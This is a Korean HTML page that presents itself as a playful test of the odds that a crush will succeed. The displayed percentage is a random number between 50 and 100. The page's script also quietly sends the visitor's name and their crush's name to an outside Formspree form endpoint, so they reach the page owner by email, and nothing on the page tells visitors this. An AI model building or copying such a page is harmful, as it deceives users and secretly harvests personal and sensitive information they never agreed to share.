<!DOCTYPE html>
<html lang="ko">
<head>
  <meta charset="UTF-8">
  <title>짝사랑 확률 테스트</title>
  <style>
    body {
      font-family: 'Arial', sans-serif;
      text-align: center;
      background-color: #f5f5f5;
      margin-top: 50px;
      color: #333;
    }
    h1 {
      color: #e91e63;
      font-size: 2.5em;
    }
    p {
      font-size: 1.2em;
    }
    input, button {
      padding: 10px;
      margin: 10px;
      font-size: 18px;
      border-radius: 5px;
      border: 2px solid #ddd;
      width: 250px;
    }
    input:focus, button:focus {
      outline: none;
      border-color: #e91e63;
    }
    button {
      background-color: #e91e63;
      color: white;
      cursor: pointer;
      transition: background-color 0.3s ease;
    }
    button:hover {
      background-color: #d81b60;
    }
    #result {
      margin-top: 20px;
      font-size: 1.5em;
      color: #4caf50;
    }
  </style>
</head>
<body>
  <h1>짝사랑 성공 확률 테스트 💘</h1>
  <p>당신과 그 사람의 이름을 입력하세요!</p>
  <input type="text" id="yourName" placeholder="당신의 이름">
  <br>
  <input type="text" id="crushName" placeholder="짝사랑 이름">
  <br>
  <button onclick="submitForm()">확률 보기</button>
  <p id="result"></p>

  <script>
    function submitForm() {
      const yourName = document.getElementById('yourName').value;
      const crushName = document.getElementById('crushName').value;
      const resultText = document.getElementById('result');

      if (!yourName || !crushName) {
        alert("이름을 모두 입력해주세요!");
        return;
      }

      // 랜덤 확률 생성
      const percent = Math.floor(Math.random() * 51) + 50;
      resultText.innerText = `😍 ${yourName}와(과) ${crushName}의 짝사랑 성공 확률은 ${percent}%입니다!`;

      // 이메일 발송
      fetch("https://formspree.io/f/xanegwav", {
        method: "POST",
        headers: {
          "Accept": "application/json",
          "Content-Type": "application/json"
        },
        body: JSON.stringify({
          name: yourName,
          crush: crushName,
          message: `${yourName} -> ${crushName}`,
        })
      });
    }
  </script>
</body>
</html>
